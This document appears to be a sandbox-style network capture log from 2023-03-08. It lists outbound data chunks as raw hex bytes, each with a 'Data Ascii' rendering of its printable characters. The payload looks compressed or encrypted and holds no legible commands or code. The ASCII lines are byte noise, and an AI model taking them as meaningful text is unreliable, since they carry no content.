                                                                                        2023-03-08 10:35:12 UTC704OUTData Raw: e7 6b ad 59 fa 93 34 a8 71 0a 25 0b 0d b0 76 24 b5 ee 49 5b 42 e4 f8 4a 27 c5 6a 1b 52 7c c1 d5 73 29 77 92 61 2b 2b f9 75 86 c2 8d 3d 9e 46 72 61 be 37 bf 95 1e 87 f6 69 11 21 2d a4 43 02 39 8f 39 9d 47 19 92 9a bf ce 0c c9 79 7e 6d 7a 3e 2b c2 81 1a 3f 78 39 f9 fc 88 4c 77 c3 27 40 8c 62 aa 2f b7 f9 b5 4d 8f e9 0b 56 31 c4 94 03 49 ac af b1 e6 41 76 3a e7 08 cd 41 c6 a9 c3 63 8e 5d 5c a9 81 c4 20 64 a1 b9 52 dc 62 01 d0 ce a4 c6 2a ee 16 11 cf 5b 3d 27 d0 c9 28 e0 b2 27 09 52 7e 5a b7 4c e9 fc 5c 98 0a 93 42 40 bd 6b 7e 18 ad 14 66 bd c8 74 37 3d 12 7a 3f b2 da 03 82 67 be ad 17 ce bb aa 29 c1 b0 c8 4a 8e 2c 7c 00 ab e7 2e 7b dc 50 00 a4 e6 53 4d a9 cf 4d e8 92 bb 7a df ca cf a4 6b a4 ec 27 b9 ea 85 4d d0 0d 18 b2 0e 74 8e 4d ec 75 af b3 b9 7d 6a 42 a4
                                                                                        Data Ascii: kY4q%v$I[BJ'jR|s)wa++u=Fra7i!-C99Gy~mz>+?x9Lw'@b/MV1IAv:Ac]\ dRb*[='('R~ZL\B@k~ft7=z?g)J,|.{PSMMzk'MtMu}jB
                                                                                        2023-03-08 10:35:12 UTC720OUTData Raw: 68 6c 39 26 1b 61 ad d2 c4 2e c8 11 3d b9 6a 43 2e e9 1e 09 d4 f8 ed 1d 42 2e 65 b9 e2 d4 59 3e cc 75 6e 4c ad 4f a0 55 3f 70 75 f6 2b 00 c8 3f 74 e5 e6 9a 0d f1 d8 c2 f5 4d a1 ad 05 29 5a ba a4 e6 5d fd 0e 76 e2 c7 2d 59 c0 d6 ad d3 8d bf 06 c9 e2 7b 8d 2d 32 a9 2d ef f5 f1 c8 55 bb 61 de 4b 93 82 8d f4 c8 55 9b a2 00 90 ab 7c 8f 45 e5 a7 47 b9 48 cd 5b 2a a4 ba c2 1a 7a b2 f0 6c 63 26 59 e9 23 02 ca 55 8e a2 06 54 9a 24 a0 6b b9 2f 45 1c 76 b3 19 ae 0a c9 75 7e 5a 3d 2b ab ea f7 89 22 8b 6f b2 40 1b 7b 6f 90 44 bf 64 99 3d 34 6a ff 98 e0 e8 bd 12 f4 5a 5e f2 9a 7d f8 93 5f 92 68 b9 20 a9 34 d1 e6 e8 35 ab 40 5a 37 92 99 65 7f d4 18 51 54 5a ec e2 92 b4 8b 47 1d 3b a7 02 e0 23 f0 84 4f 02 38 05 7e f5 9d bb f8 af 7f 7c 37 56 0a 80 f6 ab 35 87 02 48 f2 d9
                                                                                        Data Ascii: hl9&a.=jC.B.eY>unLOU?pu+?tM)Z]v-Y{-2-UaKU|EGH[*zlc&Y#UT$k/Evu~Z=+"o@{oDd=4jZ^}_h 45@Z7eQTZG;#O8~|7V5H
                                                                                        2023-03-08 10:35:12 UTC736OUTData Raw: d4 fd 4f 96 18 7c 3e a4 16 3e 0d 91 26 48 09 d1 aa 0a 40 dd 6a f0 25 99 81 06 55 d4 88 51 34 a5 82 f7 c0 42 cd 05 bc be ef a3 98 67 28 14 fb b3 0c e3 0b 29 38 0c f3 dc 5c 08 cc 0a c2 bc 80 72 56 9e 09 d2 f7 20 9a 59 19 2f 07 80 e4 90 7e 0c 64 18 b4 82 d2 b8 b0 6e a8 99 0e 04 f0 7c 7d 76 b4 9f 61 58 bc 88 6f b9 8c 2c f7 2c ea 64 bb 0a 61 5e d3 95 df 45 3f 01 39 1d 38 eb 08 c9 75 d6 40 67 8d 9b 93 c6 82 c6 d4 1f c0 40 71 27 6c 80 2a 94 a7 fe 1e 9c 3a 31 c7 a3 e3 af 00 5f 8a fd 8f ce f1 2b 6f bc 1e 77 7f e0 0e 74 1e 77 ef 3c 12 b3 74 0f f9 9f 80 90 2c 83 2c f6 90 e7 5f 86 b3 b7 fe 7d dc fc 25 cf c6 6b de b5 05 4c 36 43 36 f0 9f f9 45 38 f3 f6 af c6 d9 bb fe 25 be fc 4d ff 0b f8 92 eb a5 23 3d bd 28 ac c8 c5 3e 3e e7 bb ff 4f dc f8 aa 8c d7 3f 4b ba ef 90 ee
                                                                                        Data Ascii: O|>>&H@j%UQ4Bg()8\rV Y/~dn|}vaXo,,da^E?98u@g@q'l*:1_+owtw<t,,_}%kL6C6E8%M#=(>>O?K
                                                                                        2023-03-08 10:35:12 UTC752OUTData Raw: de 5f 57 6a a7 c3 7f f1 6f ca 5f c7 1e e3 20 f6 2b ff 77 ff d5 e5 35 88 af 1c 32 e6 97 6e f9 63 c3 e4 a2 e6 f2 63 77 58 0f 8c 70 06 1d b4 fa 7c 30 14 c1 90 c3 f7 37 7f 65 cf f3 57 7e 85 3e fc ed 2f 48 dc dc e2 f9 f1 95 ff 5b f6 c0 ef 69 bb bf 7f f3 37 ea cf f9 1f e7 5e 1b eb ff 8f fe 12 7d f8 af 5f 2b d7 57 fe 3b 7f 55 df fc eb ff 3c 07 73 7f 53 bf ff d9 bf dc eb f4 ad 48 da 97 71 8f fe eb dc a3 bf 49 ff 9e 43 ff f3 bb 83 d4 f8 39 db 9f 7f e4 eb f4 c1 7f fd 03 ec e1 7f 11 1f ec b7 bf 86 ff c3 03 7d fd ff ed 27 a8 db 1f a5 6e ff 33 7d ed f7 fd 5a 7d f0 df f8 6e d5 c1 7d 72 bd 7d a6 af fc df fc 05 7d f3 97 fc bb 72 dd 8b bf e7 f4 d0 6f 7f 18 f8 96 07 80 e4 48 db 3f a0 6d cb ba 82 7b 6c 6d f1 91 28 6c e1 9d 42 d1 52 5f f4 8b 35 61 11 ef 7c b0 8f 31 b6 f5 dc
                                                                                        Data Ascii: _Wjo_ +w52nccwXp|07eW~>/H[i7^}_+W;U<sSHqIC9}'n3}Z}n}r}}roH?m{lm(lBR_5a|1
                                                                                        2023-03-08 10:35:12 UTC768OUTData Raw: a4 df f4 c1 f7 d7 01 e0 63 49 7f ed ef 49 ff c1 5f fb 49 fd f5 1f 7d aa d7 5e 3f e8 8d d7 31 cc 2f f4 ea 5e 62 9f 54 4d ac 47 7a 55 3f eb 85 57 f5 db 7e cd 87 f4 5b bf fc 7d 44 97 fe f2 8f 49 ff f9 df fa 31 7d ef 9b 0f f4 d3 87 97 f5 46 7b a0 75 91 96 5e 46 e5 73 4e e6 4d 89 99 e7 4a 8e 0d de ca a7 87 83 8c 62 43 98 ee 01 db 78 2e e6 00 10 37 12 39 a4 2e 06 46 8f 82 c0 b3 b2 54 1d 27 57 6c 0b df 20 93 62 d6 95 60 d0 2a 30 36 61 50 2b 19 9b cc 29 b2 d1 ed c8 07 01 38 40 57 3c f0 f3 b6 86 b1 1c e2 2d d8 69 cf 07 3d 38 c9 17 b0 6b 65 b5 a3 39 25 1d d4 7d 71 86 f8 5d 03 db 77 73 84 f7 b6 1c a6 1c 43 d7 0e 71 66 95 9b e1 8c 15 d2 ee ba e7 b3 8d ec ed 74 bb db 7f aa 6b 62 77 bf 33 87 e6 da 5d 45 da a7 b2 30 ed bb bc f0 ab 73 03 af b1 47 c7 07 b1 f5 9e 2a fb e5
                                                                                        Data Ascii: cII_I}^?1/^bTMGzU?W~[}DI1}F{u^FsNMJbCx.79.FT'Wl b`*06aP+)8@W<-i=8ke9%}q]wsCqftkbw3]E0sG*
                                                                                        2023-03-08 10:35:12 UTC784OUTData Raw: 69 0f 5f b0 d4 00 22 61 97 3c 59 08 e5 b0 bb 4d d2 57 67 a5 81 d9 56 13 f5 95 64 d6 5a 75 74 b9 d8 ea 16 cc 63 47 9b fe 85 d3 19 a0 d6 07 fe 78 06 47 b6 5d be b0 6a 66 1b d3 c2 03 16 a9 ae a5 6a 12 a3 68 b5 ea 5a 0b 2d dd a1 5b d6 a5 24 d3 97 07 7e a1 53 7e 1b cd 9a e7 19 66 f2 7d 2b cd 3e c2 ee b8 ff 54 d7 f3 ca 24 c8 83 7d 79 1d a7 92 17 7a 66 a2 d0 4c 02 bb da bf 91 13 93 dc 4d d2 a9 c5 db e8 22 2b 21 b8 0a f1 6a 6c e3 c4 86 3d 9c db 9a 83 d9 a6 17 d3 64 80 70 d4 27 a4 5a f8 ac 6f 4c a2 0e 8d 62 f8 14 cb 3d 20 34 2d 26 a1 cf 35 7b 06 90 cc 7e cb 7c 74 38 ec ae af fc 52 c7 a1 bb b6 d3 b0 1b 6a a9 bb 69 3b ae f5 9b e2 29 63 9f 9d 6b ec 83 99 fd 66 fd c1 54 f6 d9 d6 66 2d 6a 5d 8f 56 57 7c 6a 8c dd 15 ba 8b 0b 31 39 77 e0 36 57 e8 55 1c db db ba ce 7d 93
                                                                                        Data Ascii: i_"a<YMWgVdZutcGxG]jfjhZ-[$~S~f}+>T$}yzfLM"+!jl=dp'ZoLb= 4-&5{~|t8Rji;)ckfTf-j]VW|j19w6WU}
                                                                                        2023-03-08 10:35:12 UTC800OUTData Raw: bf a8 2d d6 87 1f 7e a0 cb 45 42 14 a1 84 0b 79 a8 ee 56 e1 1f 5f c3 2f c9 88 d1 28 2e af 83 fd bf 35 c8 7d 21 f7 cb 8b 8c 5f 37 c8 c7 bd c7 d7 6b 7d e8 13 47 e6 ff 58 39 5f 90 e2 9f 3c a5 07 f2 e5 db a2 1e 99 da 85 af 91 0f 30 0f 3c 6f d3 1e 1f 8c 21 ef c7 71 86 bd e7 63 e2 85 3a d8 96 7d a9 77 d9 7c dc 63 78 6e 79 4d 8d 24 6c 4b 0b 63 40 ed 85 5f e7 35 ea c1 58 89 91 ff 5e 25 98 5c 29 10 9b 49 10 af 02 65 c2 81 8f df 88 a8 9f 6d d9 34 f2 cb 5f 36 ea b2 48 f7 18 de 49 cb c3 2b fd ad fa 92 7e fe d7 7e c2 07 c0 6f d0 af fc d9 12 23 eb 3f f8 be 07 7d cb bf f5 ef e9 cf 7d ff 07 fa e2 ab 8f b4 bc 5e 18 cb c4 f9 fa f3 7f 03 30 39 11 4a 54 bf c8 93 8e 45 39 63 3e 8b 5f 6e 29 c5 48 cc 4c 98 d6 59 93 b8 c3 56 81 8b 19 dd dc b0 43 7c 2b f9 aa 7f 00 cc 4b c8 29 4b
                                                                                        Data Ascii: -~EByV_/(.5}!_7k}GX9_<0<o!qc:}w|cxnyM$lKc@_5X^%\)Iem4_6HI+~~o#?}}^09JTE9c>_n)HLYVC|+K)K
                                                                                        2023-03-08 10:35:12 UTC816OUTData Raw: 0e e4 65 ac f7 07 6d 60 83 75 00 f8 96 b7 bc c5 e2 c9 7a 71 eb 36 fe db af 7e dd 4e 77 62 ce 76 16 21 c6 ee 13 a7 0d aa 76 29 a4 72 5c a4 81 d9 e1 a4 6f 40 e9 f5 74 f1 1c ea 5e c1 4d 74 7e e3 cb 35 3c 4f 92 ab 7c a3 a8 bf 8b 17 01 d3 a3 78 ea 6d ff 1c 57 8f bf 19 e0 a4 42 dd d0 84 18 d0 32 09 fa ae d1 7e 26 52 6f 2a 10 10 3e 91 00 27 4c f5 0d 40 4a 86 ae cd dc ae 32 49 90 1a 83 62 09 d5 5a 28 27 db 5a 70 95 8e a4 b9 6b 6b 53 9f a3 01 b9 f3 f1 a4 8c 06 3b be 4d dd be f7 fd 4c 0e 00 eb df f1 73 17 77 5f f9 1a 5c fd fa df 68 f6 69 d7 5b 5f f7 d5 b8 f5 75 af 0c bf c3 a3 ff 79 50 f4 79 b2 e0 fb c7 d4 95 a4 c9 51 ad 71 95 2d 07 7f 32 7d 3c 35 d6 93 29 a3 5f a7 b0 ae 3a 22 8e 11 60 9b 82 2c cd 36 a4 60 e9 eb 07 40 ef f9 b2 5f fa 96 5e 2f 0c 44 9e 7a 22 07 05 a8
                                                                                        Data Ascii: em`uzq6~Nwbv!v)r\o@t^Mt~5<O|xmWB2~&Ro*>'L@J2IbZ('ZpkkS;MLsw_\hi[_uyPyQq-2}<5)_:"`,6`@_^/Dz"
                                                                                        2023-03-08 10:35:12 UTC832OUTData Raw: db 89 fd 42 0e fa 5d de f6 19 eb a4 f7 80 e5 fd 7d 41 56 8c 9e bf 8d 4e d4 fd b6 e2 6e 3c bb 69 d7 34 6c e3 35 e8 ea 7d 91 d5 a7 d6 af b3 64 67 86 71 92 85 01 73 ef 80 5c 31 45 54 3f 29 af f9 6d fb b5 4d d6 2b c8 18 c7 57 ee bf 63 7c 8b 64 2f 5b 6c 3f 97 5b ed 56 e2 89 f9 22 4f 45 45 5c 31 dc 6b f4 61 f4 0b a9 a9 fd b7 cf b9 cb 1c ef 9f c8 bb af 53 7f 6e 18 22 d7 f9 a8 6f 6c 6c e7 78 b6 d9 52 47 dd 04 3d b3 2b 07 59 94 8e ec 31 e9 1d 38 83 da 28 33 67 f8 1b ea 57 7a 27 99 96 3c 4b a6 f2 89 f7 9f a8 8c 01 d3 7a df 28 ee b5 65 e8 3f ec d4 37 e9 fe 27 34 e5 57 58 d0 6a fa 7d 4f da ce e0 e4 e6 b8 2e fa 54 35 cf e7 80 91 e5 df f5 ba 8f c8 15 0b fb 54 3d ad 96 cc 18 47 fe 9a 17 52 73 9e 6a 40 3c fa 45 1a dc 8e 23 f6 73 d7 9f 26 f6 91 26 7c 45 87 42 76 dd 80 35
                                                                                        Data Ascii: B]}AVNn<i4l5}dgqs\1ET?)mM+Wc|d/[l?[V"OEE\1kaSn"ollxRG=+Y18(3gWz'<Kz(e?7'4WXj}O.T5T=GRsj@<E#s&&|EBv5
                                                                                        2023-03-08 10:35:12 UTC848OUTData Raw: a1 9e 3e 99 e8 d0 0e 3e b4 f3 21 1e ae e0 43 3c e8 20 10 fe d9 df 58 f7 81 0e 0c a9 b8 99 c7 95 26 41 c9 48 a6 62 a3 0e ff 24 e3 ea 1e 68 5f f7 a1 0f 3d 6b fe 8a ed 58 ce d5 b5 eb a1 e7 41 53 bf 86 a2 76 1b 82 21 66 33 23 fa 95 40 bc f7 2f 9c 6f 00 2a 9f 67 ad 5c 77 00 b8 e9 64 9c 17 6d ba 8d ee 01 04 0e 1b b0 26 75 74 23 c7 0e 52 43 ae d8 2b bf e0 b7 e3 73 5f f1 b9 d7 7e 03 30 bd f6 ad 3a ce b2 57 3c 90 1c 07 80 7f e2 2b f0 a5 7f f1 0d 0f 64 6f 23 72 cd bb 64 3f 1c 5c 2d 9f ac e7 1e d0 8b 71 be c0 42 ec 9b 35 78 37 bb fe da eb 7f b3 6e 14 0f 5a 37 8b ef 5e df 18 7a b0 b8 60 ba a5 03 c0 7f 06 3f 38 a8 03 be 83 7c 39 4d 70 0d cc bc 72 21 89 07 39 00 bc f5 71 df 0d 1f c8 11 07 f8 07 10 fa c6 d2 0d 58 74 12 ee 71 37 dd 58 6d a2 fe 2f 00 a0 3b 55 f9 69 8e b4
                                                                                        Data Ascii: >>!C< X&AHb$h_=kXASv!f3#@/o*g\wdm&ut#RC+s_~0:W<+do#rd?\-qB5x7nZ7^z`?8|9Mpr!9qXtq7Xm/;Ui
                                                                                        2023-03-08 10:35:12 UTC864OUTData Raw: 00 6c 35 d9 19 ed 8c b9 87 bf 4b 10 4c eb ce 18 83 6c 01 fc 3c b4 10 eb 64 51 e7 06 1a fc a1 d7 f8 55 e2 b9 6a 0c 32 c7 e9 6b b7 8a 5f 2a 8f fa eb 85 66 4c ef d7 c6 ea 55 23 bf c4 8e 86 c6 1c f2 6d 10 3d f0 c5 89 b6 ba 34 3f b2 cd 53 16 df 6c 5f c0 8f ed 73 32 fd ec d3 37 d7 8b 9c 6c 96 7b 3b 20 5b 67 47 c7 93 b2 61 7e ed fa cf ed 93 34 9f d7 a8 af fa 69 5e a4 9e ef dd 21 46 e8 69 98 e9 f9 d3 3a ca 61 6f 7e 7a 57 cb bc 7b 0f 2d cf 5d cb 8e 86 9c 92 25 93 df ea fd bb 03 0c 45 c6 25 13 b7 cc 8b d4 dc 85 a3 fc 07 41 a6 79 48 d9 dd a4 8c 92 b7 06 89 fa 26 e5 9b 6a 40 3c ba 8b 4c c3 a0 4f 96 4e 1d 2c 99 b6 10 5a 37 68 fc c6 9e 8e ac c4 38 9d e3 3e d4 6e 4e 81 7c c4 c7 89 a8 d1 91 fd 98 b9 4e 61 38 73 b7 55 f9 b5 16 b5 a7 8f f8 2f f7 80 e1 d4 73 60 ea b6 63 77
                                                                                        Data Ascii: l5KLl<dQUj2k_*fLU#m=4?Sl_s27l{; [gGa~4i^!Fi:ao~zW{-]%E%AyH&j@<LON,Z7h8>nN|Na8sU/s`cw
                                                                                        2023-03-08 10:35:12 UTC880OUTData Raw: ab 3b ba 2b d6 c0 72 e5 62 5e fe a4 63 6c f4 d1 a1 62 07 6f c3 b2 19 03 a5 92 14 ba c6 78 e2 31 28 ff c9 64 0d 60 d9 f1 d4 48 0b 68 d7 da a1 83 fc 65 dd 5b 77 d9 66 77 3f 07 1b 5a 7c b2 1f c7 86 45 73 9e 0b d5 3e 91 9c c7 da 5a 74 db e7 60 fd c2 c7 aa 79 db 80 5c 06 99 23 96 d2 6a 4d ce 18 63 16 33 86 ef d6 a0 6a a9 e5 9f e1 74 28 56 32 19 4e 6d 8f 6c c1 13 c9 7a 16 32 37 c9 aa eb 30 7e b6 6e f5 80 c9 5e cf aa f5 b2 43 f8 88 e7 df 90 1e d3 2d 15 f0 c1 9b 3a 20 72 d8 82 b2 45 6c d1 38 df 09 1a 46 79 6c d5 74 5b 17 ad c9 8e 2b 35 62 3c 63 a5 2f bb 29 2c 43 b1 b7 e3 3c 62 5c db 3c 57 e7 a7 b3 27 da 7f 94 1d 47 69 19 63 bd 28 d5 a0 2b f2 13 85 0e eb 18 30 c5 6d ff 84 9a 1e 4b b6 b1 26 cd 47 55 91 76 ba 87 b1 46 11 40 06 e7 68 5e 54 d2 74 4b d6 1a 78 ec c1 b1
                                                                                        Data Ascii: ;+rb^clbox1(d`Hhe[wfw?Z|Es>Zt`y\#jMc3jt(V2Nmlz270~n^C-: rEl8Fylt[+5b<c/),C<b\<W'Gic(+0mK&GUvF@h^TtKx
                                                                                        2023-03-08 10:35:12 UTC896OUTData Raw: ca 5b 4d 6b 19 2c 31 24 c0 e6 77 fa ed 3e 5d 4a 3f 81 4b ee ce 90 71 ce 10 9c 27 7c 71 ba 72 8d 53 79 09 11 3a fa a3 1d 0b 13 39 64 7e d2 47 ab b5 0d ce 6a fe b2 49 91 0f 8d a7 3f 17 64 b7 4c 0b f6 cf fe cb bb f1 ff 85 f8 c4 06 c0 f4 ff 58 28 11 35 00 69 75 6f d0 46 bc a7 bf af ab f7 c6 25 ea a9 1c 2e ad 5f 53 b4 a2 bd 66 76 8a 5e f3 ae 52 ae f2 53 e3 2f 20 f4 17 d4 17 f0 bb b8 04 62 a2 7d 5d 83 5f 60 a7 2c d0 b1 40 a7 57 b0 f6 e6 2a 7b 96 7f 8f 6d c5 00 86 dc 96 ba fa bc a5 1f 20 26 5e c6 b5 bf 7c 4c 40 0e 52 df 6d e5 23 41 40 18 5e ce a7 f2 d2 87 73 da 7c c8 90 71 bb af 93 e7 df e7 97 88 03 3e e5 1f 35 5c f8 07 a2 3e 67 61 e6 9a f5 fc 81 d9 c6 71 9a cb 22 1f 7d 02 b3 cd a8 7b 86 f6 fd f2 0c f0 12 b3 5d 6a 9e 53 5c cf ff 39 fb 40 79 ad 82 9c 7b d5 6f 96
                                                                                        Data Ascii: [Mk,1$w>]J?Kq'|qrSy:9d~GjI?dLX(5iuoF%._Sfv^RS/ b}]_`,@W*{m &^|L@Rm#A@^s|q>5\>gaq"}{]jS\9@y{o
                                                                                        2023-03-08 10:35:12 UTC912OUTData Raw: 3c b4 fc 76 01 60 00 4e 83 03 7a e5 df 42 77 b5 7e a1 7d 7b 5f a1 19 eb 29 27 4b 1e 30 9c 9a 7d dd 7e ee 54 be 0a 1f af cf d1 ff ce 98 df c4 3f c5 97 ef 27 ba cb fa 90 fa 15 7f df 5b a3 65 5d ec 1e 76 2c d4 e3 05 18 d1 47 fa 51 1c e5 95 18 e0 b8 96 47 87 1f 23 d9 d3 0d 10 31 0f ef c4 f6 45 f6 63 f7 0f 10 f1 32 7c 1b d6 f8 40 e2 5e ac 3f 90 76 e9 79 e7 3c 9a 6f d5 5a f2 c4 00 e8 5f 84 24 3f 6d af cf 1f 98 73 18 dd b6 5c 46 e1 8b 34 d0 fd d7 3a 5e ba f8 27 f5 00 50 05 19 ea 24 b6 1a d0 eb 57 b2 ab 71 dd 7e 40 d8 b6 ba df f9 01 0c 04 f6 dc 77 ec ab e6 27 41 c0 6c b3 8f eb 97 18 1f 16 9c cb 9e e9 96 09 01 11 af ed cb f8 85 c0 d7 63 ca 2d c6 d5 35 b0 ca 63 3e 2b ae cf ef 66 40 b7 f1 34 c4 d7 33 b9 df 8c 00 5b 2f 2b 13 61 0f ca 6b 01 10 86 1e e7 0a 26 4c c5 bf
                                                                                        Data Ascii: <v`NzBw~}{_)'K0}~T?'[e]v,GQG#1Ec2|@^?vy<oZ_$?ms\F4:^'P$Wq~@w'Alc-5c>+f@43[/+ak&L
                                                                                        2023-03-08 10:35:12 UTC928OUTData Raw: 2a ee 45 c1 2f cd bf f2 0d 44 9c a1 7b d0 0f e3 a9 07 02 37 49 5a 6a e0 5d b5 95 74 5c da 2f e5 43 28 f2 c6 4b 7a e9 18 46 61 c9 23 fd 8d f2 b6 7e a3 f8 36 44 00 30 00 9e 51 5e 6f 00 5c b6 3d c3 0b 68 66 4e bf 1e e8 16 eb ce 5e fd 01 ec cd 3a eb 27 20 40 7c 29 40 19 24 f6 ba 3a c1 6e c4 13 4a d6 a8 b4 5d 2f 20 81 eb 28 60 c2 6c 6d 3e 7f 60 d2 af 7b d1 23 07 6d fb eb af b7 4d be 9e 60 e5 14 38 2c 56 65 c2 67 a0 61 62 d3 7c c1 0f c0 ab 33 f5 c5 02 e8 04 65 03 b0 a8 59 de d0 6f 63 18 79 eb 9e 73 56 a6 93 6e 26 3b 4a c6 73 48 da 8f ea 5e f2 d1 b6 01 e8 f3 63 37 af 5f 29 28 75 f5 51 d7 11 98 63 86 6e 7d 02 73 4c ed af a7 81 c0 03 31 a6 1e 08 7e a8 13 28 ca 3c 5f 1a d5 8a d8 07 20 ec 9c 61 17 e6 5b 52 2b 47 87 9f a1 d2 9d d6 57 85 45 79 36 4d fc d0 5d 67 40 1a
                                                                                        Data Ascii: *E/D{7IZj]t\/C(KzFa#~6D0Q^o\=hfN^:' @|)@$:nJ]/ (`lm>`{#mM`8,Vegab|3eYocysVn&;JsH^c7_)(uQcn}sL1~(<_ a[R+GWEy6M]g@
                                                                                        2023-03-08 10:35:12 UTC944OUTData Raw: 4f ff c8 c7 97 3e e8 76 f6 c8 07 de 6e 2d dc 28 cf 5a 3d ed 23 6a 03 f0 7f e2 06 e0 03 0d fe b3 49 de 5c 75 3e 78 43 f6 1b ad e8 d3 97 da 8f fc ca b5 f6 bb ef 7c a5 bd f9 03 ef b6 27 3d f2 31 f6 d0 2b 1e 6c 0f b9 fb 03 ec fc d3 e7 d9 eb de fd 26 7b cd bb de 60 ff f3 03 3e dd 2e 1d 2e 18 bf 01 f8 a6 37 ff 95 5d 76 d9 65 76 d1 c7 36 00 ed 6c be 3e b6 01 38 55 b3 bf 11 8f 9a f2 40 0c cc 6f e4 c0 5c 36 d9 0d 41 ea dd 27 a8 a6 07 e0 7c c6 05 8a 2f 5d 27 ae 29 dd e6 74 21 6e 23 03 f3 3c 2a 93 fc 00 d4 cf ab f8 01 ca bc 3b a7 40 a9 4f f9 e6 43 a7 3e a7 2c 10 b1 cf 24 48 9e 57 f7 e1 fe 2a 9f ce bb c6 f8 04 57 88 4d 19 bb a1 c6 76 aa 83 58 3e e4 ef c4 ed f5 bf 92 57 71 0a 54 f3 2a b2 7a 18 f8 41 ac e6 77 d1 c0 dc d7 ec 03 c0 2e 07 d2 cd 7c ec ce 5f 26 67 d4 16 12
                                                                                        Data Ascii: O>vn-(Z=#jI\u>xC|'=1+l&{`>..7]vev6l>8U@o\6A'|/]')t!n#<*;@OC>,$HW*WMvX>WqT*zAw.|_&g
                                                                                        2023-03-08 10:35:12 UTC960OUTData Raw: 80 f7 12 1b a0 81 4e 5b c3 bd 90 4e 31 03 3e 48 4e f9 10 ee 73 c4 0f 3c cd 94 f6 a1 05 34 5c b2 c0 d0 e0 c7 ae 76 51 d4 e0 80 e8 a7 f5 af 81 07 3c 90 f4 13 5f b0 02 e8 61 38 01 31 ae ec 7a 68 fa aa 18 8d 49 65 76 00 63 bc e9 7a 75 87 be 07 3b 3b d9 64 bc 69 5e a7 3c db ba d5 2f 50 53 90 29 39 50 72 34 97 4b 6f 0f f4 af 45 f0 be eb 80 2d 1f 50 7c 19 0c 28 b2 d1 06 60 7b 1f 33 23 d6 ce 8e dd 58 16 f2 14 41 f9 0c 14 df 51 b8 0f 15 d7 01 a0 3a cb 6b 90 f2 a4 32 ad a8 d7 4a 20 e7 64 cd 67 d0 17 fa 16 07 24 2e 3f 46 3e ef 5a a0 ef 7b 6c 4f ae 9c 40 e4 05 62 6d 73 c0 1a 88 32 33 05 5c 7f d8 c9 7e c5 f5 0f 38 1b 25 02 4a 7f 3f 15 9f e2 78 00 05 cb be 15 20 ca 47 fe 17 f8 cc 3e d7 1e 9f 38 b3 6e 45 63 fa 0b 4e 34 06 62 9c b1 37 3e 8f d7 ef 04 de c4 e9 1d 7b cc a4
                                                                                        Data Ascii: N[N1>HNs<4\vQ<_a81zhIevczu;;di^</PS)9Pr4KoE-P|(`{3#XAQ:k2J dg$.?F>Z{lO@bms23\~8%J?x G>8nEcN4b7>{
                                                                                        2023-03-08 10:35:12 UTC976OUTData Raw: d0 d6 9c 56 b1 51 01 65 a1 cb ad b5 9a b5 c7 4e 73 15 fc 34 0a 93 d1 9d 26 47 b5 c9 d9 c2 58 cd 4e 0d e2 d1 e2 23 61 c8 01 1f f5 9c 0e 5f 73 83 38 fc 48 86 1b c5 74 c9 5a af 5f 4e 95 68 ac 62 b9 6c 79 a9 1b c9 62 08 d1 26 26 8c fc 51 9a d6 43 5a 27 08 f7 a1 7a dd c4 4d b7 1a 27 09 cf ba ab b7 f5 97 f8 8c 97 35 c7 09 fe 5f 7f ed 1d 90 98 34 1e a8 6c 60 6e 18 42 18 2c 44 aa f5 11 14 7a c9 71 1c 71 04 a2 63 ce f9 b6 b1 87 b5 2e 42 2a e1 27 35 76 a2 7c da d7 3b a8 9e a7 0f 80 eb 32 fa c8 dc 1d 38 69 39 d4 b6 d6 3f e1 93 e0 8a 14 3a 6f ad 1e b2 13 da 89 d6 8c bf aa 09 ee c9 75 9c 86 83 7c e4 d3 48 2d d5 27 0c 1e 51 a4 03 88 8d d3 9c 81 c4 3b 41 37 97 a4 09 93 55 62 20 fa f5 fc 40 99 9c 25 12 60 bd 3d 10 b1 4b 9c 51 bf 8b d5 81 e7 76 f2 80 2d be c7 4e 7d 7e c6
                                                                                        Data Ascii: VQeNs4&GXN#a_s8HtZ_Nhblyb&&QCZ'zM'5_4l`nB,Dzqqc.B*'5v|;28i9?:ou|H-'Q;A7Ub @%`=KQv-N}~
                                                                                        2023-03-08 10:35:12 UTC992OUTData Raw: f2 1c 6d fc 02 d4 c6 f6 d8 06 60 9b 91 ad fd 38 af 5b ad 32 9e f7 87 dc 59 6e 00 b5 bf 89 e5 b6 4c 94 11 35 1f c5 c0 58 46 39 8b 5f bf 40 c1 79 39 71 5b 0b 50 b8 b6 d8 0e 67 b1 01 bc 25 96 41 5f 2e b6 e0 9b c1 01 87 8d db 68 8e 1d 3f 30 f6 bf 69 2e 8f 78 79 09 63 d0 67 4b a8 0f 3c ad fd 02 36 45 3f e0 fa 29 d5 1a b9 d8 17 86 85 f7 b0 19 ae e6 0b 68 67 3e 82 b1 9f a6 29 4c 00 8e 4f 80 37 1e eb cf 52 32 2c f9 d6 cb 67 d6 ff 92 bd 5e ff c0 fa f1 6d 5a db 4d 60 c0 d8 cf 21 d7 1f 50 78 86 d2 6c bc a5 ae c3 26 49 53 35 eb a7 d1 1e dc 5d f4 1b 99 db f0 db fc 02 2d 22 da 8d ce 8a cb b6 ee 9e 0a 44 fb e9 3c 45 fd 88 6f a5 00 cd fa 03 96 f9 72 9c ea 63 3a 2e 55 a6 03 a8 39 01 d7 77 f7 bf 8a 97 39 48 f6 c7 54 80 f3 d5 21 1a 74 03 a3 12 1f ea 77 c1 4f e5 83 9d b5 7e
                                                                                        Data Ascii: m`8[2YnL5XF9_@y9q[Pg%A_.h?0i.xycgK<6E?)hg>)LO7R2,g^mZM`!Pxl&IS5]-"D<Eorc:.U9w9HT!twO~
                                                                                        2023-03-08 10:35:12 UTC1008OUTData Raw: 6d fc 6b 8a 97 4c 40 37 f6 06 50 62 55 d3 27 f8 8a 8f 42 d2 16 91 99 d0 03 5d 8c 96 1e df 56 d1 f8 06 d0 e9 a7 4a fc 65 bc 00 43 9f a8 89 ec cf d2 55 ae 9c 59 9e 44 c9 50 57 e2 3b 84 af e1 ec f8 d7 68 33 78 20 8e 4d 1b 8f d0 00 0a 78 95 95 e0 15 cc 99 ab b6 39 d8 28 f1 0f 32 75 48 20 b6 8f 2a 09 f9 66 0e c7 0c c0 5d 1b f6 25 00 5d 38 16 3f d5 e6 2f c7 79 50 78 8d bf 86 47 b8 ff 18 54 b2 3a 24 80 48 58 53 99 6f 14 51 af a1 53 8d 4f 6c 6f 6a c1 30 96 78 19 67 e2 1b e9 9c a7 22 87 fb 11 2f 93 26 f1 64 c8 a4 03 7a ff 39 89 6b 3c b1 5c 3f 06 a9 2b 6f 10 d9 e9 99 97 15 12 80 56 89 8d 49 1a 2f 4b c7 ed 